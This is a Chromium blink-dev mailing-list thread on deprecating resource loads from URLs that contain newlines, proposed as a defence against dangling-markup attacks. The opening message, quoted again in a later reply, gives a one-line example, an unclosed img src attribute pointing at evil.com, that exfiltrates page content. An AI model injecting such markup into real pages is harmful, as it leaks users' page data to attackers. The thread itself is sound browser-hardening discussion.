Intent to Deprecate: Loading resources with newlines in URLs.

253 views
Skip to first unread message

Mike West

unread,
Mar 28, 2017, 10:01:17 AM3/28/17
to blink-dev

Primary eng (and PM) emails

mk...@chromium.org


Summary

I'd like to add a deprecation warning for resource fetches for URLs that originally contained newline characters in the hopes that usage is curbed at levels reasonable for removal.


Motivation

As discussed in https://groups.google.com/a/chromium.org/forum/#!msg/blink-dev/rOs6YRyBEpw/D3pzVwGJAgAJ, dangling markup is the next softest attack surface, assuming robust defense against direct script injection. Some forms of dangling markup attacks rely upon injecting an unclosed attribute that sucks up portions of a page, and exfiltrates them to an external endpoint (e.g. `<img src='https://evil.com/?` eats the page until the next `'`). This is possible because the URL parser helpfully discards newline characters. It would be lovely if we could make the parser less helpful.


As it turns out, walking through and copying URLs to remove newline characters is also quite expensive (~13% of URL canonicalization time). Removing that complexity (by erroring out early) would have a marginally positive impact on perf.


Compatibility And Interoperability Risk

Moderate, depending on strategy.


URL parsing behavior is ancient, and is likely to be relied upon by the long tail. That said, the initial numbers gathered in https://www.chromestatus.com/metrics/feature/timeline/popularity/1768 aren't that terrible. While spot-checking the 94 hits in HTTP Archive[1], I realized that the 0.014% reflected in that metric is an upper-bound because a) I'm an idiot and forgot to initialize the "was whitespace removed" flag in `url::Parsed`'s copy constructor (surely random memory is always "false", right?), and b) I'm measuring all URL resolution rather than those that result in resource loads. My intuition is that the actual impact is significantly lower.


Based on the numbers we end up with, we could approach the problem in at least two ways:


1. We could block loads entirely, which is the simplest approach.

2. We could adopt parsing rules similar to CSS's `url(...`, which cuts the URL at the end of the line, rather than scanning for a closing `)`.


I'd prefer the former, but the latter is probably lower-risk, as URLs might still work even if a few URL params are chopped off.


Alternative implementation suggestion for web developers

Explicitly encode newlines as `&#10;`. Also escape your input and output so you don't have content-injection holes in the first place.


Usage information from UseCounter

See above.


OWP launch tracking bug

https://crbug.com/680970


Entry on the feature dashboard

https://www.chromestatus.com/feature/5735596811091968


Requesting approval to remove too?

No. I'd target a milestone out after landing the deprecation to collect more concrete metrics than I have above.



-mike

[1]: 
```
SELECT 
  url,
  JSON_EXTRACT(payload, '$._blinkFeatureFirstUsed.Features.DocumentCompleteURLHTTPContainingNewline') AS feature
FROM [httparchive:har.2017_03_15_chrome_pages]
HAVING feature IS NOT NULL
LIMIT 500
```

Anne van Kesteren

unread,
Mar 28, 2017, 10:38:19 AM3/28/17
to Mike West, blink-dev
On Tue, Mar 28, 2017 at 4:00 PM, Mike West <mk...@chromium.org> wrote:
> Alternative implementation suggestion for web developers
>
> Explicitly encode newlines as `&#10;`. Also escape your input and output so
> you don't have content-injection holes in the first place.

This is bad advice, as a newline in input is not the same as
percent-encoding it. The advice should be to not have newlines in
URLs. As an aside you can mention that percent-encoded newlines will
continue working.


--
https://annevankesteren.nl/

Mike West

unread,
Mar 28, 2017, 10:39:25 AM3/28/17
to Anne van Kesteren, blink-dev
Fair, and accurate.

-mike

Philip Jägenstedt

unread,
Mar 30, 2017, 9:58:55 AM3/30/17
to Mike West, Anne van Kesteren, blink-dev
The use counter is surprisingly high for something one would expect to be very rare. Have you fixed it or added a new one that corresponds to the resource fetches you'd like to block?

As long as there are two possible paths, what would the deprecation message say? Could you learn anything from the http archive results?

If we could guess a best path and just be ready to course correct, that would be nice :)

Yoav Weiss

unread,
Apr 1, 2017, 1:16:16 AM4/1/17
to Mike West, blink-dev
On Tue, Mar 28, 2017 at 4:01 PM Mike West <mk...@chromium.org> wrote:

Primary eng (and PM) emails

mk...@chromium.org


Summary

I'd like to add a deprecation warning for resource fetches for URLs that originally contained newline characters in the hopes that usage is curbed at levels reasonable for removal.


Motivation

As discussed in https://groups.google.com/a/chromium.org/forum/#!msg/blink-dev/rOs6YRyBEpw/D3pzVwGJAgAJ, dangling markup is the next softest attack surface, assuming robust defense against direct script injection. Some forms of dangling markup attacks rely upon injecting an unclosed attribute that sucks up portions of a page, and exfiltrates them to an external endpoint (e.g. `<img src='https://evil.com/?` eats the page until the next `'`). This is possible because the URL parser helpfully discards newline characters. It would be lovely if we could make the parser less helpful.


As it turns out, walking through and copying URLs to remove newline characters is also quite expensive (~13% of URL canonicalization time). Removing that complexity (by erroring out early) would have a marginally positive impact on perf.


Yay!
 

Compatibility And Interoperability Risk

Moderate, depending on strategy.


URL parsing behavior is ancient, and is likely to be relied upon by the long tail. That said, the initial numbers gathered in https://www.chromestatus.com/metrics/feature/timeline/popularity/1768 aren't that terrible. While spot-checking the 94 hits in HTTP Archive[1], I realized that the 0.014% reflected in that metric is an upper-bound because a) I'm an idiot and forgot to initialize the "was whitespace removed" flag in `url::Parsed`'s copy constructor (surely random memory is always "false", right?), and b) I'm measuring all URL resolution rather than those that result in resource loads. My intuition is that the actual impact is significantly lower.


Based on the numbers we end up with, we could approach the problem in at least two ways:


1. We could block loads entirely, which is the simplest approach.

2. We could adopt parsing rules similar to CSS's `url(...`, which cuts the URL at the end of the line, rather than scanning for a closing `)`.


I'd prefer the former, but the latter is probably lower-risk, as URLs might still work even if a few URL params are chopped off.


I'd claim that the former is lower risk, since the latter can cause subtle bugs in Web apps, which might be harder to figure out.
 

Alternative implementation suggestion for web developers

Explicitly encode newlines as `&#10;`. Also escape your input and output so you don't have content-injection holes in the first place.


Usage information from UseCounter

See above.


OWP launch tracking bug

https://crbug.com/680970


Entry on the feature dashboard

https://www.chromestatus.com/feature/5735596811091968


Requesting approval to remove too?

No. I'd target a milestone out after landing the deprecation to collect more concrete metrics than I have above.



-mike

[1]: 
```
SELECT 
  url,
  JSON_EXTRACT(payload, '$._blinkFeatureFirstUsed.Features.DocumentCompleteURLHTTPContainingNewline') AS feature
FROM [httparchive:har.2017_03_15_chrome_pages]
HAVING feature IS NOT NULL
LIMIT 500
```

--
You received this message because you are subscribed to the Google Groups "blink-dev" group.
To unsubscribe from this group and stop receiving emails from it, send an email to blink-dev+...@chromium.org.

Simon Pieters

unread,
Apr 4, 2017, 5:19:59 AM4/4/17
to blink-dev, Mike West
This only happens in CSS if there is nothing but whitespace before EOF. If
you do:

@import url(style?
garbage);

then the whole declaration is dropped -- it doesn't import "style?".


> I'd prefer the former, but the latter is probably lower-risk, as URLs
> might
> still work even if a few URL params are chopped off.

Have you searched for data: URLs specifically? Or javascript:? Or is the
proposal to only reject newlines for "special" schemes?


> Alternative implementation suggestion for web developers
>
> Explicitly encode newlines as `&#10;`. Also escape your input and output
> so
> you don't have content-injection holes in the first place.
>
> Usage information from UseCounter
> <https://code.google.com/p/chromium/codesearch#chromium/src/third_party/WebKit/Source/core/page/UseCounter.h&sq=package:chromium&type=cs&q=file:UseCounter.h%20Feature&l=39>
>
> See above.
>
> OWP launch tracking bug
>
> https://crbug.com/680970
>
> Entry on the feature dashboard <https://www.chromestatus.com/>
>
> https://www.chromestatus.com/feature/5735596811091968
>
> Requesting approval to remove too?
>
> No. I'd target a milestone out after landing the deprecation to collect
> more concrete metrics than I have above.
>
>
> -mike
>
> [1]:
> ```
> SELECT
> url,
> JSON_EXTRACT(payload,
> '$._blinkFeatureFirstUsed.Features.DocumentCompleteURLHTTPContainingNewline')
> AS feature
> FROM [httparchive:har.2017_03_15_chrome_pages]
> HAVING feature IS NOT NULL
> LIMIT 500
> ```
>


--
Simon Pieters
Opera Software

Mike West

unread,
Apr 4, 2017, 6:20:39 AM4/4/17
to Philip Jägenstedt, Anne van Kesteren, blink-dev
On Thu, Mar 30, 2017 at 3:58 PM, Philip Jägenstedt <foo...@chromium.org> wrote:
The use counter is surprisingly high for something one would expect to be very rare. Have you fixed it or added a new one that corresponds to the resource fetches you'd like to block?

I haven't fixed it yet; I was planning on doing that with the deprecation message once y'all let me at it. If you're concerned, I guess we can fix the counter and then deprecate once it hits stable and I can give you real numbers.

I suspect that the numbers are high for two reasons:

1. I didn't properly initialize the boolean in the copy-constructor, so there's a ~chance of non-deterministicly deciding that a URL had whitespace stripped from it, even if it hadn't.

2. The use counter counted URL completions, as opposed to loads. We complete URLs all over the place, even if they're not at all related to resource loading.

As long as there are two possible paths, what would the deprecation message say? Could you learn anything from the http archive results?
 
I spot-checked 20 of the 92 hits in HTTPArchive. Of those, only 3 loaded resources that contained newlines: two were analytics scripts that scraped the `keywords` meta information, but didn't encode newlines, and one was a typo in an `<img>` that neglected to close an attribute string (which is exactly the behavior I'm aiming to change). The remainder contained one or more links whose `href` contained newlines. I'm not able to judge the contents of the links, as they were all in languages I don't speak, but only 3 were in a page's navigational menu.

I can go through the other pages in more detail if that would be helpful.
 
If we could guess a best path and just be ready to course correct, that would be nice :)

I would prefer to simply block loads. I'd only want to back off of that to a looser interpretation if the numbers show that blocking would have a larger-than-expected impact. 

Philip Jägenstedt

unread,
Apr 4, 2017, 6:38:07 AM4/4/17
to Mike West, Anne van Kesteren, blink-dev
On Tue, Apr 4, 2017 at 5:20 PM 'Mike West' via blink-dev <blin...@chromium.org> wrote:
On Thu, Mar 30, 2017 at 3:58 PM, Philip Jägenstedt <foo...@chromium.org> wrote:
The use counter is surprisingly high for something one would expect to be very rare. Have you fixed it or added a new one that corresponds to the resource fetches you'd like to block?

I haven't fixed it yet; I was planning on doing that with the deprecation message once y'all let me at it. If you're concerned, I guess we can fix the counter and then deprecate once it hits stable and I can give you real numbers.

I suspect that the numbers are high for two reasons:

1. I didn't properly initialize the boolean in the copy-constructor, so there's a ~chance of non-deterministicly deciding that a URL had whitespace stripped from it, even if it hadn't.

2. The use counter counted URL completions, as opposed to loads. We complete URLs all over the place, even if they're not at all related to resource loading.

As long as there are two possible paths, what would the deprecation message say? Could you learn anything from the http archive results?
 
I spot-checked 20 of the 92 hits in HTTPArchive. Of those, only 3 loaded resources that contained newlines: two were analytics scripts that scraped the `keywords` meta information, but didn't encode newlines, and one was a typo in an `<img>` that neglected to close an attribute string (which is exactly the behavior I'm aiming to change). The remainder contained one or more links whose `href` contained newlines. I'm not able to judge the contents of the links, as they were all in languages I don't speak, but only 3 were in a page's navigational menu.

I can go through the other pages in more detail if that would be helpful.

That should suffice to give us an idea about the kinds of breakage to expect. It sounds like the 3 cases that would be affected would be fairly harmless. Was the img a 404 already, or was the newline in the query string and ignored?

It sounds like most newlines are in href attributes, then, and those will not be affected at all?

Extrapolating, perhaps 15 sites or the ~500k in httparchive have resource URLs that would be blocked. That's ~0.003%, which cannot be meaninfully compared to use counter numbers, but it's a small enough number that we should probably try this and see how it goes.

If we could guess a best path and just be ready to course correct, that would be nice :)

I would prefer to simply block loads. I'd only want to back off of that to a looser interpretation if the numbers show that blocking would have a larger-than-expected impact.

LGTM1. Can you report back here with the new use counter numbers before the actual removal hits stable?

Mike West

unread,
Apr 4, 2017, 9:37:36 AM4/4/17
to Philip Jägenstedt, Anne van Kesteren, blink-dev
On Tue, Apr 4, 2017 at 12:37 PM, Philip Jägenstedt <foo...@chromium.org> wrote:
On Tue, Apr 4, 2017 at 5:20 PM 'Mike West' via blink-dev <blin...@chromium.org> wrote:
On Thu, Mar 30, 2017 at 3:58 PM, Philip Jägenstedt <foo...@chromium.org> wrote:
The use counter is surprisingly high for something one would expect to be very rare. Have you fixed it or added a new one that corresponds to the resource fetches you'd like to block?

I haven't fixed it yet; I was planning on doing that with the deprecation message once y'all let me at it. If you're concerned, I guess we can fix the counter and then deprecate once it hits stable and I can give you real numbers.

I suspect that the numbers are high for two reasons:

1. I didn't properly initialize the boolean in the copy-constructor, so there's a ~chance of non-deterministicly deciding that a URL had whitespace stripped from it, even if it hadn't.

2. The use counter counted URL completions, as opposed to loads. We complete URLs all over the place, even if they're not at all related to resource loading.

As long as there are two possible paths, what would the deprecation message say? Could you learn anything from the http archive results?
 
I spot-checked 20 of the 92 hits in HTTPArchive. Of those, only 3 loaded resources that contained newlines: two were analytics scripts that scraped the `keywords` meta information, but didn't encode newlines, and one was a typo in an `<img>` that neglected to close an attribute string (which is exactly the behavior I'm aiming to change). The remainder contained one or more links whose `href` contained newlines. I'm not able to judge the contents of the links, as they were all in languages I don't speak, but only 3 were in a page's navigational menu.

I can go through the other pages in more detail if that would be helpful.

That should suffice to give us an idea about the kinds of breakage to expect. It sounds like the 3 cases that would be affected would be fairly harmless. Was the img a 404 already, or was the newline in the query string and ignored?

The image that didn't close its `src` attribute was already a 404 (as it was requesting something like `/img.png><p>The next paragraph ...`).
 
It sounds like most newlines are in href attributes, then, and those will not be affected at all?

Not by this intent, no.

That said, if we're successful at blocking subresource requests, it would be reasonable to take the next step of removing the special-cases from the URL parser entirely due to the perf impact, in which case we would affect those links.

Extrapolating, perhaps 15 sites or the ~500k in httparchive have resource URLs that would be blocked. That's ~0.003%, which cannot be meaninfully compared to use counter numbers, but it's a small enough number that we should probably try this and see how it goes.

SGTM.
 

If we could guess a best path and just be ready to course correct, that would be nice :)

I would prefer to simply block loads. I'd only want to back off of that to a looser interpretation if the numbers show that blocking would have a larger-than-expected impact.

LGTM1. Can you report back here with the new use counter numbers before the actual removal hits stable?

This is just a deprecation intent; I'll come back to y'all with numbers before removing (assuming that the numbers match our intuitions).

-mike

Mike West

unread,
Apr 4, 2017, 9:52:39 AM4/4/17
to Simon Pieters, blink-dev
Hi, Simon! Sorry I missed your email on the first pass!

On Tue, Apr 4, 2017 at 11:19 AM, Simon Pieters <sim...@opera.com> wrote:
On Tue, 28 Mar 2017 16:00:52 +0200, Mike West <mk...@chromium.org> wrote:

1. We could block loads entirely, which is the simplest approach.

2. We could adopt parsing rules similar to CSS's `url(...`, which cuts the
URL at the end of the line, rather than scanning for a closing `)`.

This only happens in CSS if there is nothing but whitespace before EOF. If you do:

@import url(style?
garbage);

then the whole declaration is dropped -- it doesn't import "style?".

Interesting. That's an argument for just blocking the requests wholesale.

I'd prefer the former, but the latter is probably lower-risk, as URLs might
still work even if a few URL params are chopped off.

Have you searched for data: URLs specifically? Or javascript:? Or is the proposal to only reject newlines for "special" schemes?

The deprecation patch I'd like to land in https://codereview.chromium.org/2794303002 splits out a counter for HTTP-family URLs and non-HTTP-family URLs. I think it would be best if we could treat them similarly, but if the numbers are terrible, I'd be happy with only blocking HTTP-family URLs that actually hit the network.

-mike

Simon Pieters

unread,
Apr 4, 2017, 10:45:42 AM4/4/17
to Mike West, blink-dev
On Tue, 04 Apr 2017 15:52:15 +0200, Mike West <mk...@google.com> wrote:

> Hi, Simon! Sorry I missed your email on the first pass!

No worries. My email was from today. ^_^

> On Tue, Apr 4, 2017 at 11:19 AM, Simon Pieters <sim...@opera.com> wrote:
>>
>> This only happens in CSS if there is nothing but whitespace before EOF.
>> If
>> you do:
>>
>> @import url(style?
>> garbage);
>>
>> then the whole declaration is dropped -- it doesn't import "style?".
>
>
> Interesting. That's an argument for just blocking the requests wholesale.

Agreed.


>> Have you searched for data: URLs specifically? Or javascript:? Or is the
>> proposal to only reject newlines for "special" schemes?
>
>
> The deprecation patch I'd like to land in
> https://codereview.chromium.org/2794303002 splits out a counter for
> HTTP-family URLs and non-HTTP-family URLs. I think it would be best if we
> could treat them similarly, but if the numbers are terrible, I'd be happy
> with only blocking HTTP-family URLs that actually hit the network.

OK. With "special" scheme I meant:
https://url.spec.whatwg.org/#special-scheme

Since I already queried httparchive earlier I checked that for data: and
javascript: instances.

https://bugs.chromium.org/p/chromium/issues/detail?id=680970#c3

$ grep -oi "\bdata:" results-20170117-125808.csv | wc -l
12
$ grep -oi "\bjavascript:" results-20170117-125808.csv | wc -l
5

All of these are legitimate uses of newlines (no case of accidentally
omitting a quote). data: URLs can become quite long so it can be nice to
wrap them, and it is natural to use newlines in javascript. Although rare
on the whole (17 instances from ~500,000 pages), it seems unnecessary to
break these images/links.


For completeness, the only instance that is not http, https, data, or
javascript, is tel:

http://www.jusmisiones.gov.ar/,http://www.jusmisiones.gov.ar/,"<area
class=""noborder iopacity100 icolor147a7a""
coords=""16,64,20,64,22,68,24,72,22,77,22,79,32,88,34,88,38,83,42,85,46,87,47,89,47,92,42,96,34,96,31,94,26,92,21,88,15,80,13,76,12,74,12,70,13,67""
href=""tel:
+543764446543"" shape=""poly"" />"

Mike West

unread,
Apr 4, 2017, 10:51:35 AM4/4/17
to Simon Pieters, blink-dev
Thank you for doing the research. As it turns out, a lot of Blink's layout tests rely on wrapped `data:` URLs. :(

In any event, the patch measures them separately. I would love to be able to just remove the logic from our URL parser completely, but if we can't do that because of usage, I'd be happy enough with HTTP-family schemes.
 
For completeness, the only instance that is not http, https, data, or javascript, is tel:

http://www.jusmisiones.gov.ar/,http://www.jusmisiones.gov.ar/,"<area class=""noborder iopacity100 icolor147a7a"" coords=""16,64,20,64,22,68,24,72,22,77,22,79,32,88,34,88,38,83,42,85,46,87,47,89,47,92,42,96,34,96,31,94,26,92,21,88,15,80,13,76,12,74,12,70,13,67"" href=""tel:
+543764446543"" shape=""poly"" />"

That is an exciting URL!

-mike
Reply all
Reply to author
Forward
0 new messages